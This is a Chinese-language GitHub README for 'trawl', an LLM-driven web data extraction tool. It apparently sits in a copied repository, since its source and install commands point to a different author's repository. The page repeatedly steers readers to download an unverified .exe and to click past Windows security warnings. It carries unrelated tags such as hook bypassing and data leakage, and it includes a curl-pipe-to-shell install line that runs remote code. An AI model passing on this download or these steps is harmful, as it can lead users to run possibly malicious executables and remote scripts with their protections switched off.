teamn9636/trawl

GitHub: teamn9636/trawl

一款基于大语言模型的智能网页数据提取工具,无需编写选择器即可自动从网站抓取结构化数据并适应页面变更。

Stars: 0 | Forks: 0

# 🐟 trawl - 轻松提取网站数据 [![下载 trawl](https://img.shields.io/badge/Download-trawl-blue?style=for-the-badge&logo=github)](https://github.com/teamn9636/trawl/releases) ![trawl](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/7873e8d531182654.png) ## 📋 什么是 trawl? Trawl 是一个从任何网站提取结构化数据的工具。你只需告诉它你想要*什么*信息,而不是*如何*找到这些信息。当网站发生变化时,trawl 会自动调整以持续准确地获取数据。它运行速度快,且不需要为每个页面额外调用 API。 你不需要知道如何编写 CSS 选择器或代码。只需提供简单的指令,剩下的工作交给 trawl 即可。 ## 🖥️ 系统要求 Trawl 可在 Windows 10 及更新版本上运行。你的电脑应具备: - 64 位处理器 - 至少 4 GB 内存 (RAM) - 500 MB 的可用磁盘空间 你还需要互联网连接来下载和运行程序,并允许其访问网站以提取数据。 ## 📥 下载和安装 [![下载 trawl](https://img.shields.io/badge/Download-trawl-green?style=for-the-badge&logo=windows)](https://github.com/teamn9636/trawl/releases) 要在 Windows 上开始使用 trawl,请访问下面的发布页面。页面会显示可供下载的最新版本。 **前往此处下载:** https://github.com/teamn9636/trawl/releases 寻找以 `.exe` 结尾的文件(这是 Windows 安装程序或可执行文件)。点击它进行下载。 ### 如何在 Windows 上运行 trawl 1. 从发布页面下载 `.exe` 文件。 2. 在你的下载文件夹中找到已下载的文件。 3. 双击文件打开。如果弹出安全警告,请选择“运行”或“更多信息”,然后选择“仍要运行”。 4. 程序将在新窗口或命令提示符中打开。 运行 trawl 不需要安装额外的软件,但在其运行后,你需要打开命令提示符(或 PowerShell)。 ## 🚀 trawl 入门指南 按照以下步骤从网站提取数据。 ### 步骤 1:打开命令提示符 - 按下 Windows 键。 - 输入 `cmd` 并按回车键。这将打开一个名为命令提示符的黑色窗口。 ### 步骤 2:设置你的 API key Trawl 使用大语言模型 (LLM) 来确定要提取的正确数据。你需要添加来自你 API 提供商的密钥。 根据你使用的 AI 平台,输入以下命令(将 `YOUR_API_KEY` 替换为你的真实密钥): 对于 Google Gemini: ``` set GOOGLE_GEMINI_APIKEY=YOUR_API_KEY ``` 对于 Anthropic: ``` set ANTHROPIC_API_KEY=YOUR_API_KEY ``` 按回车键为当前会话保存密钥。 ### 步骤 3:使用网站 URL 运行 trawl 输入如下简单的命令来获取产品信息: ``` trawl "https://books.toscrape.com" --fields "title, price, rating, in_stock" ``` 此命令要求 trawl 从示例网站获取产品标题、价格、评分和库存信息。 ### 步骤 4:将输出保存为 CSV(可选) 如果你希望结果保存为 CSV 文件(便于在 Excel 中打开),请添加此标志 (flag): ``` trawl "https://books.toscrape.com" --fields "title, price, rating, in_stock" --csv > products.csv ``` 这会将输出保存到你运行命令的文件夹中名为 `products.csv` 的文件里。 ## 🛠️ 功能一览 - 无需编写代码或 CSS 选择器。 - 网站更改时自动适应。 - 初始设置后运行速度快。 - 对每种网站布局仅使用一次 AI,节省时间和 API 用量。 - 完全在你的电脑上运行,确保数据抓取稳定。 - 支持输出为 JSON 和 CSV 格式。 - 适用于多种类型的网站和数据。 ## 🔧 更多安装方式(面向高级用户) 如果你想以不同方式使用 trawl,可以通过其他方法安装或构建。 - 在 PowerShell 中运行此命令进行安装: ``` curl -fsSL https://raw.githubusercontent.com/akdavidsson/trawl/main/install.sh | sh ``` - 或者,如果你安装了 Go 编程语言,请运行: ``` go install github.com/akdavidsson/trawl@latest ``` - 从源代码构建: ``` git clone https://github.com/akdavidsson/trawl cd trawl go build -o trawl . ``` 对于大多数用户来说,下载并运行 `.exe` 文件是最简单的方法。 ## 🤔 故障排除与技巧 - 如果命令行提示“command not found”(找不到命令),请确保你是从 trawl 所在的文件夹运行命令,或者将 trawl 添加到系统 PATH 中。 - 除非将 API key 添加到系统环境变量中,否则每次打开命令提示符时都必须设置它。 - 在网站 URL 和字段周围使用引号以避免错误。 - 先尝试简单的网站以熟悉命令操作。 - 如果提取结果看起来不对,请检查你的 API key 和网站 URL。 ## 📚 了解更多 有关详细的说明和高级选项,请查看官方 GitHub 仓库: https://github.com/teamn9636/trawl [![下载 trawl](https://img.shields.io/badge/Download-trawl-purple?style=for-the-badge&logo=windows)](https://github.com/teamn9636/trawl/releases)
标签:BSD, EVTX分析, Python, URL抓取, Web Scraping, Windows软件, 人工智能, 大模型, 数据抓取, 数据挖掘, 数据泄露, 数据清洗, 文档结构分析, 无后门, 日志审计, 用户模式Hook绕过, 结构化数据, 网页提取, 自适应抓取